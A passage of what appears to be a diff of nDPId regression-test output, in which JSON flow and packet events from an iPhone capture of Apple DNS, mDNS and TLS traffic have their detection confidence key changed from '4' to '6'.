{"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598246,"flow_last_seen":1582454598246,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1582454598246,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1582454598247,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":252,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":252,"pkt_l4_len":218,"thread_ts_msec":1582454598247,"pkt":"xGGLNYKpxiwDYGpkCABFAADuMPYAAEARw6bAqAIBwKgCEQA19qcA2lqQHhSBgAABAAkAAAAADXAyNi1mbWZtb2JpbGUGaWNsb3VkA2NvbQAAAQABwAwABQABAAARlgAcCWZtZm1vYmlsZQJmZQlhcHBsZS1kbnMDbmV0AMA2AAEAAQAAAA8ABBH4uYzANgABAAEAAAAPAAQR+IMIwDYAAQABAAAADwAEEfiDysA2AAEAAQAAAA8ABBH4g8vANgABAAEAAAAPAAQR+LmkwDYAAQABAAAADwAEEfi5Z8A2AAEAAQAAAA8ABBH4g7LANgABAAEAAAAPAAQR+Lkw"} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":54,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598205,"flow_last_seen":1582454598247,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454598247,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63143,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p26-fmfmobile.icloud.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.248.185.140"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":54,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598205,"flow_last_seen":1582454598247,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454598247,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63143,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p26-fmfmobile.icloud.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.248.185.140"}} 00731{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1582454598247,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1582454598247,"pkt":"xGGLNYKpxiwDYGpkCABFAAD6F4oAAEAR3QbAqAIBwKgCEQA195UA5qzeldOBgAABAAkAAAAAE3AyNi1rZXl2YWx1ZXNlcnZpY2UGaWNsb3VkA2NvbQAAAQABwAwABQABAAARlgAiD2tleXZhbHVlc2VydmljZQJmZQlhcHBsZS1kbnMDbmV0AMA8AAEAAQAAADUABBH4uVfAPAABAAEAAAA1AAQR+LkmwDwAAQABAAAANQAEEfi5J8A8AAEAAQAAADUABBH4uQrAPAABAAEAAAA1AAQR+IOrwDwAAQABAAAANQAEEfi5Z8A8AAEAAQAAADUABBH4uYTAPAABAAEAAAA1AAQR+LmN"} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598204,"flow_last_seen":1582454598247,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1582454598247,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63381,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p26-keyvalueservice.icloud.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.248.185.87"}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598204,"flow_last_seen":1582454598247,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1582454598247,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63381,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p26-keyvalueservice.icloud.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.248.185.87"}} 00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1582454598248,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"thread_ts_msec":1582454598248,"pkt":"xGGLNYKpxiwDYGpkCABFAADVXGwAAEARmEnAqAIBwKgCEQA18aYAwXDXjvGBgAABAAQAAAAACmdzcGUzNS1zc2wCbHMFYXBwbGUDY29tAAABAAHADAAFAAEAAAtxACQKZ3NwZTM1LXNzbAhscy1hcHBsZQNjb20GYWthZG5zA25ldADANQAFAAEAAAFNACIKZ3NwZTM1LXNzbAJscwVhcHBsZQNjb20HZWRnZWtlecBUwGUABQABAAARlgAWBWU2OTg3AmU5CmFrYW1haWVkZ2XAVMCTAAEAAQAAAA8ABF9lGTU="} -00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598209,"flow_last_seen":1582454598248,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1582454598248,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gspe35-ssl.ls.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.25.53"}} +00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598209,"flow_last_seen":1582454598248,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1582454598248,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gspe35-ssl.ls.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.25.53"}} 00576{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1582454598252,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1582454598252,"pkt":"xGGLNYKpxiwDYGpkCABFAACEYIUAAEARlIHAqAIBwKgCEQA12moAcAk\/JH+BgAABAAIAAAAACWdzcDg1LXNzbAJscwVhcHBsZQNjb20AAAEAAcAMAAUAAQAADY0AJAlnc3A4NS1zc2wJbHMyLWFwcGxlA2NvbQZha2FkbnMDbmV0AMA0AAEAAQAAAD8ABBGCAi4="} -00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":57,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598212,"flow_last_seen":1582454598252,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1582454598252,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55914,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsp85-ssl.ls.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.130.2.46"}} +00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":57,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598212,"flow_last_seen":1582454598252,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1582454598252,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55914,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsp85-ssl.ls.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.130.2.46"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598252,"flow_last_seen":1582454598252,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598252,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1582454598252,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598252,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGrHrAqAIREfi5jMWPAbsN6rbUAAAAALDC\/\/8jQQAAAgQFtAEDAwcBAQgKEd\/m0wAAAAAEAgAA"} 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1582454598287,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1582454598287,"pkt":"xGGLNYKpxiwDYGpkCABFAADPyCcAAEARLJTAqAIBwKgCEQA1xz8Au1lGYEOBgAABAAUAAAAAB2NhcHRpdmUFYXBwbGUDY29tAAABAAHADAAFAAEAABGWACoMY2FwdGl2ZS1jaWRyDG9yaWdpbi1hcHBsZQNjb20GYWthZG5zA25ldADALwAFAAEAAAC8AA4LY2FwdGl2ZS1jZG7APMBlAAUAAQAAAOYAFAdjYXB0aXZlAWcHYWFwbGltZ8AawH8AAQABAAAAEQAEEf1pysB\/AAEAAQAAABEABBH9Nco="} -00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598246,"flow_last_seen":1582454598287,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454598287,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.105.202"}} +00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598246,"flow_last_seen":1582454598287,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454598287,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.105.202"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598373,"flow_last_seen":1582454598373,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1582454598373,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598373,"pkt":"xiwDYGpkxGGLNYKpCABFAAA8dgsAAP8RwELAqAIRwKgCAdihADUAKKMQFxsBAAABAAAAAAAABG1lc3UFYXBwbGUDY29tAAABAAE="} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598373,"flow_last_seen":1582454598373,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"mesu.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598373,"flow_last_seen":1582454598373,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"mesu.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598373,"flow_last_seen":1582454598373,"flow_idle_time":200000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454598373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1582454598373,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1582454598373,"pkt":"AQBeAAD7xGGLNYKpCABFAABemlUAAP8RfYTAqAIR4AAA+xTpFOkASu+LAAAAAAABAAAAAAABCF9ob21la2l0BF90Y3AFbG9jYWwAAAyAAQAAKQWgAAARlAASAAQADgAA5mGLNYKpxGGLNYKp"} -00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598373,"flow_last_seen":1582454598373,"flow_idle_time":200000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454598373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} +00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598373,"flow_last_seen":1582454598373,"flow_idle_time":200000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454598373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} 00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1582454598373,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":128,"pkt_l4_len":74,"thread_ts_msec":1582454598373,"pkt":"MzMAAAD7xGGLNYKpht1gD8z1AEoR\/\/6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAD7FOkU6QBKKFMAAAAAAAEAAAAAAAEIX2hvbWVraXQEX3RjcAVsb2NhbAAADIABAAApBaAAABGUABIABAAOAADmYYs1gqnEYYs1gqk="} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598377,"flow_last_seen":1582454598377,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598377,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1582454598377,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598377,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/2TAqAIRX2UZNcWQAbugppinAAAAALDC\/\/8BIgAAAgQFtAEDAwcBAQgKEd\/nTAAAAAAEAgAA"} @@ -97,221 +97,221 @@ 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1582454598387,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598387,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysAAAFAslesxAAAAALDC\/\/8mdwAAAgQFtAEDAwYBAQgKEd\/nTQAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1582454598402,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598402,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADEG+34R+LmMwKgCEQG7xY+mDHMKDeq21aBScSAX2QAAAgQFrAEBCAr26Z7FEd\/m0wEDAwU="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1582454598404,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598404,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGrIbAqAIREfi5jMWPAbsN6rbVpgxzC4AQBAuwVwAAAQEIChHf52v26Z7F"} -00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598252,"flow_last_seen":1582454598405,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598405,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598252,"flow_last_seen":1582454598405,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598405,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1582454598412,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598412,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGSmlfZRk1wKgCEQG7xZCMPaCSoKaYqKBScSBNPAAAAgQFrAQCCAoi0AShEd\/nTAEDAwc="} 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1582454598412,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1582454598412,"pkt":"xGGLNYKpxiwDYGpkCABFAADIRW8AAEARr1PAqAIBwKgCEQA12KEAtAJjFxuBgAABAAUAAAAABG1lc3UFYXBwbGUDY29tAAABAAHADAAFAAEAAAfrAB8IbWVzdS1jZG4FYXBwbGUDY29tBmFrYWRucwNuZXQAwCwABQABAAAMoAAYCG1lc3UtY2RuDG9yaWdpbi1hcHBsZcA7wFcABQABAAAARAARBG1lc3UBZwdhYXBsaW1nwBfAewABAAEAAAAPAAQR\/WnKwHsAAQABAAAADwAEEf01yw=="} -00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598373,"flow_last_seen":1582454598412,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1582454598412,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"mesu.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.105.202"}} 